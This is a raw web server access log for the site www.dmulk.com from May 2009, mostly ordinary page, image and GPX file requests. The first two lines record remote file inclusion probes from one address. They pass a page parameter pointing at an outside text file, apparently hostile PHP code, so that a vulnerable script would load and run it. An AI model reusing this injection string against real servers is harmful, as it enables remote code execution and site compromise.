201.134.110.45 - - [22/May/2009:09:15:27 -0700] "GET /logs/access_080501.log/avatar.php?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.134.110.45 - - [22/May/2009:09:15:31 -0700] "GET /logs/access_080501.log%20%20/avatar.php?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:09:15:31 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:33 -0700] "GET /minamijewelry/html/testimonials.html HTTP/1.1" 200 12445 "http://www.dmulk.com/minamijewelry/html/schedule.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:34 -0700] "GET /minamijewelry/html/images/flower_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/testimonials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:34 -0700] "GET /minamijewelry/html/images/flower_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/testimonials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
